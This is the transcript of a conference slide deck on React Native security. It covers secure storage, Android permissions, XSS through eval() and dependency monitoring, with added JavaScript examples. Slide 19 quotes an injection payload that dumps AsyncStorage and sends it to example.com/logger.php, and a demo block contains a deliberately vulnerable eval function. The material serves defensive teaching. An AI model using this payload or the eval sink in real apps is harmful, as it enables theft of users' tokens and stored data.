Slide 1

Slide 1 text

React Native Security: Addressing Typical Mistakes
JULIA POTAPENKO

Slide 2

Slide 2 text

About me: Security Software Engineer at Cossack Labs. We help companies protect their sensitive and valuable data. @julepka

Slide 3

Slide 3 text

We will talk about: architecture, platform usage, dependencies.

Slide 4

Slide 4 text

“Choosing React Native and its components means that you understand and accept potential security consequences.”

Slide 5

Slide 5 text

Architecture basics: React Native is a cross-platform solution from Facebook that allows writing native apps using React (JavaScript or TypeScript).

Slide 6

Slide 6 text

Trusting third parties: Apple and Google are must-haves. Add Facebook to the list.

Slide 7

Slide 7 text

Trusting third parties: Apple and Google are must-haves. Add Facebook to the list.

Slide 8

Slide 8 text

Trusting third parties: Apple and Google are must-haves. Add Facebook to the list.
CVE-2020-1911, CVE-2020-1912, CVE-2020-1913

Slide 9

Slide 9 text

“Working with React Native, developers deal with security for all three platforms: iOS, Android and React Native.”

Slide 10

Slide 10 text

OWASP Mobile Top 10 #1 Improper platform usage

Slide 11

Slide 11 text

React Native is a leaky abstraction @vixentael

Slide 12

Slide 12 text

Secure Store Example

                                      iOS: Keychain   Android: SharedPreferences + KeyStore
Data stored encrypted                 Yes             Yes

Slide 13

Slide 13 text

Secure Store Example

                                      iOS: Keychain                    Android: SharedPreferences + KeyStore
Data stored encrypted                 Yes                              Yes
Data persists across app reinstalls   Yes                              No
Hardware-backed encryption            Yes                              Depends on device vendor
Data decrypted only before usage      Decrypted when device unlocked   Yes
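The reinstall row is the one that bites in practice: on iOS, a user who deletes and reinstalls the app, or the next user of a shared device, can find the previous install's Keychain items still readable, while the Android KeyStore entries are gone with the uninstall. The usual guard is to keep a first-run flag in storage that is wiped on uninstall and to clear the Keychain whenever the flag is missing. The block below is an added example, not code from the talk or from Cossack Labs: react-native-keychain and AsyncStorage are replaced by in-memory fakes constructed here that mimic the few calls used, and the flag name is a hypothetical choice.

```javascript
// Added example, not from the talk: a guard for the "data persists across
// app reinstalls: Yes" row of the iOS Keychain column. react-native-keychain
// and AsyncStorage are replaced by in-memory fakes (constructed here) that
// mimic the subset of their API used below, so the logic runs offline.

// Hypothetical flag name. It must live in storage that IS wiped on
// uninstall (AsyncStorage is, on both platforms) so that its absence
// reliably means "fresh install".
const FIRST_RUN_FLAG = 'app.hasLaunchedBefore';

// Fake of react-native-keychain's setGenericPassword / getGenericPassword /
// resetGenericPassword. The object outlives "uninstall" on purpose, to model
// Keychain items surviving the app being deleted.
function makeFakeKeychain() {
  let item = null;
  return {
    async setGenericPassword(username, password) { item = { username, password }; return true; },
    async getGenericPassword() { return item ? { ...item } : false; },
    async resetGenericPassword() { item = null; return true; },
  };
}

// Fake of AsyncStorage's getItem / setItem.
function makeFakeAsyncStorage() {
  const map = new Map();
  return {
    async getItem(key) { return map.has(key) ? map.get(key) : null; },
    async setItem(key, value) { map.set(key, String(value)); },
  };
}

// Call this before any Keychain read on app start. If the first-run flag
// is missing, anything the Keychain still holds belongs to a previous
// install (or a previous user of the device) and is cleared.
// Resolves to true when a wipe happened.
async function wipeKeychainOnFreshInstall(keychain, storage) {
  const launchedBefore = await storage.getItem(FIRST_RUN_FLAG);
  if (launchedBefore === 'true') return false;
  await keychain.resetGenericPassword();
  await storage.setItem(FIRST_RUN_FLAG, 'true');
  return true;
}

// Scenario: install, store a session token, uninstall, reinstall.
async function simulateReinstall() {
  const keychain = makeFakeKeychain();
  let storage = makeFakeAsyncStorage();

  const wipedOnFirstInstall = await wipeKeychainOnFreshInstall(keychain, storage);
  await keychain.setGenericPassword('session', 'token-from-old-install');

  // Uninstall: AsyncStorage is gone, the Keychain item is not.
  storage = makeFakeAsyncStorage();
  const leftover = await keychain.getGenericPassword();

  // Reinstall: no flag, so the guard clears the Keychain before use.
  const wipedOnReinstall = await wipeKeychainOnFreshInstall(keychain, storage);
  const afterGuard = await keychain.getGenericPassword();

  return {
    wipedOnFirstInstall,                  // true (nothing to clear, flag set)
    leftoverSurvived: leftover !== false, // true: the old token was still there
    wipedOnReinstall,                     // true
    afterGuard,                           // false: Keychain is now empty
  };
}

simulateReinstall().then((result) => console.log(result));
```

The guard must run before the first Keychain read, not after the login screen, and the flag must not be stored in the Keychain itself or it would survive the uninstall too.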

Slide 14

Slide 14 text

Managing Android Permissions. Android: permissions can be declared in multiple files (the app's AndroidManifest.xml and each library's own manifest, merged at build time).

Slide 15

Slide 15 text

Managing Android Permissions. Android: permissions can be declared in multiple files + React Native: it is common practice to use third-party solutions

Slide 16

Slide 16 text

Managing Android Permissions. Android: permissions can be declared in multiple files + React Native: it is common practice to use third-party solutions =

Slide 17

Slide 17 text

Managing Android Permissions. Android: permissions can be declared in multiple files + React Native: it is common practice to use third-party solutions = “I don’t need this permission.” “The app crashes if I delete it.”

Slide 18

Slide 18 text

Is XSS possible? The likelihood of XSS is reduced by design (React Native renders native views, not HTML).

Slide 19

Slide 19 text

Is XSS possible? The likelihood of XSS is reduced by design, but XSS is still possible, for example through eval():

_reactNative.AsyncStorage.getAllKeys(function (err, result) {
  _reactNative.AsyncStorage.multiGet(result, function (err, result) {
    fetch('http://example.com/logger.php?token=' + JSON.stringify(result));
  });
});

Steal all the data from local storage (AsyncStorage) by exploiting an eval-based injection and accessing React Native APIs.
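The payload on the slide never touches a DOM: all it needs is an eval() of attacker-controlled text and the React Native module object that every bundle exposes. The block below is an added example, not code from the talk: it runs that payload against fakes constructed here (a callback-style AsyncStorage holding two invented items and a fetch that records URLs instead of sending them), beside the fix, which is to treat the text as data with JSON.parse.

```javascript
// Added example, not from the talk: the slide's eval() payload run against
// constructed fakes of AsyncStorage and fetch, beside the safe alternative.

const exfiltrated = []; // every URL the fake fetch was asked for

// Fake AsyncStorage with two invented items. The real module is async;
// a synchronous callback fake keeps the demonstration deterministic.
globalThis._reactNative = {
  AsyncStorage: {
    _data: { 'auth.token': 'eyJ-demo-token', 'user.email': 'alice@example.com' },
    getAllKeys(cb) { cb(null, Object.keys(this._data)); },
    multiGet(keys, cb) { cb(null, keys.map((k) => [k, this._data[k]])); },
  },
};

// Fake fetch: records the request instead of sending it.
globalThis.fetch = (url) => { exfiltrated.push(String(url)); return Promise.resolve({ ok: true }); };

// The payload from the slide, quotes normalised. Everything it references is
// reachable from plain JavaScript inside the bundle.
const PAYLOAD =
  "_reactNative.AsyncStorage.getAllKeys(function(err,result){" +
  "_reactNative.AsyncStorage.multiGet(result,function(err,result){" +
  "fetch('http://example.com/logger.php?token='+JSON.stringify(result));});});";

// Vulnerable on purpose: a "remote config" string from the server is
// evaluated as code, which is the injection the slide describes.
function applyRemoteConfigVulnerable(untrustedText) {
  return eval(untrustedText);
}

// Hardened: the same text is parsed as data. Code is a SyntaxError, and
// valid JSON yields an inert object with no way to reach module APIs.
function applyRemoteConfigSafe(untrustedText) {
  return JSON.parse(untrustedText);
}

// Runs both against the payload and a benign config; returns what happened.
function demo() {
  exfiltrated.length = 0;
  applyRemoteConfigVulnerable(PAYLOAD);
  const leakedUrls = exfiltrated.slice();

  let safeRejectedPayload = false;
  try {
    applyRemoteConfigSafe(PAYLOAD);
  } catch (e) {
    safeRejectedPayload = e instanceof SyntaxError;
  }
  const benign = applyRemoteConfigSafe('{"theme":"dark","retries":3}');

  return { leakedUrls, safeRejectedPayload, benign };
}

console.log(demo());
```

new Function and the string form of setTimeout are the same sink under a different name; any path that turns network-supplied text into code puts the whole AsyncStorage, and every other native module the bundle imports, within the attacker's reach.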

Slide 20

Slide 20 text

Apart from source code:
Annual BIS reports (US encryption export regulations)
Apple privacy rules
User acknowledgement of private data usage

Slide 21

Slide 21 text

“50 shades of dependencies”

Slide 22

Slide 22 text

A typical day for React Native app developer

Slide 23

Slide 23 text

A typical day for a React Native app developer (it is a joke)

Slide 24

Slide 24 text

Monitoring dependencies

Slide 25

Slide 25 text

Monitoring dependencies
So many dependencies
Additional CI work
Integrating dependency checkers

Slide 26

Slide 26 text

Monitoring dependencies
So many dependencies
Additional CI work
One update triggers another update
Integrating dependency checkers
Updates may be incompatible
What if there is no fix for a vulnerability?

Slide 27

Slide 27 text

What if there is no fix?
✅ Learn more about the issue and its scope
✅ Document it, make the team aware
✅ Monitor it and book time for the update
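A dependency checker only produces the list; the work is sorting that list into the three cases the slides name (an update that just needs applying, an update that is a breaking change, and a vulnerability with no fix at all) and making sure the last group gets documented and revisited. The block below is an added example, not the talk's or Cossack Labs' code, of that triage. It assumes the input is the JSON of npm audit --json (auditReportVersion 2, with a vulnerabilities map whose entries carry a fixAvailable field); the report in the block is constructed, and its package names and advisory titles are invented.

```javascript
// Added example, not from the talk: triage an `npm audit --json` report into
// the three situations the slides describe (plain update, breaking update,
// no fix) and turn the last group into a tracking record. SAMPLE_AUDIT is
// constructed to follow the auditReportVersion 2 layout; names are invented.

const SAMPLE_AUDIT = {
  auditReportVersion: 2,
  vulnerabilities: {
    'example-parser': {
      name: 'example-parser', severity: 'high', isDirect: false,
      via: [{ title: 'Prototype pollution' }], fixAvailable: true,
    },
    'example-image-lib': {
      name: 'example-image-lib', severity: 'moderate', isDirect: true,
      via: [{ title: 'Path traversal' }],
      fixAvailable: { name: 'example-image-lib', version: '3.0.0', isSemVerMajor: true },
    },
    'example-old-transport': {
      name: 'example-old-transport', severity: 'critical', isDirect: false,
      via: [{ title: 'Unsafe deserialization' }, 'example-parser'], fixAvailable: false,
    },
  },
};

// fixAvailable is true (an in-range update exists), an object (update to a
// specific version, possibly semver-major) or false (nothing to update to).
function classifyFix(fixAvailable) {
  if (fixAvailable === true) return 'update';
  if (fixAvailable && typeof fixAvailable === 'object') {
    return fixAvailable.isSemVerMajor ? 'breaking-update' : 'update';
  }
  return 'no-fix';
}

// Buckets every vulnerable package. `via` mixes advisory objects with the
// names of packages the problem is inherited from; only objects carry a title.
function triageAudit(report) {
  const buckets = { update: [], 'breaking-update': [], 'no-fix': [] };
  for (const v of Object.values(report.vulnerabilities || {})) {
    buckets[classifyFix(v.fixAvailable)].push({
      name: v.name,
      severity: v.severity,
      direct: Boolean(v.isDirect),
      titles: (v.via || []).filter((x) => typeof x === 'object').map((x) => x.title),
    });
  }
  return buckets;
}

// For packages with no fix: the record the slide asks for. Scope is left for
// a human to fill in after reading the advisory; the review date turns
// "monitor it" into a scheduled task instead of a hope.
function noFixRecords(buckets, today, owner, reviewDays = 30) {
  const next = new Date(today.getTime() + reviewDays * 24 * 60 * 60 * 1000);
  return buckets['no-fix'].map((v) => ({
    package: v.name,
    severity: v.severity,
    issues: v.titles,
    scope: 'TO ASSESS: is the vulnerable code path reachable from this app?',
    owner,
    nextReview: next.toISOString().slice(0, 10),
  }));
}

const triaged = triageAudit(SAMPLE_AUDIT);
console.log(JSON.stringify(triaged, null, 2));
console.log(noFixRecords(triaged, new Date('2020-10-01T00:00:00Z'), 'mobile-team'));
```

The breaking-update bucket is the one that costs calendar time in a React Native project, since a semver-major bump of a native module often drags the React Native version, and with it the iOS and Android toolchains, along with it.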

Slide 28

Slide 28 text

What if there is no fix?
✅ Learn more about the issue and its scope
✅ Document it, make the team aware
✅ Monitor it and book time for the update
React Native requires the team to plan its time more carefully.

Slide 29

Slide 29 text

React Native requires the team to plan its time more carefully:
➡ iOS or Android update
➡ React Native update
➡ Forked version update
➡ Dependencies update
➡ Mobile app source code update

Slide 30

Slide 30 text

Final Thoughts “Learn once, write anywhere.” “Learn once, ask mobile security people for help.”

Slide 31

Slide 31 text

Where to go next
My React Native Security article: https://www.cossacklabs.com/blog/react-native-app-security.html
React Native Security Guide: https://reactnative.dev/docs/security

Slide 32

Slide 32 text

Thank You! @julepka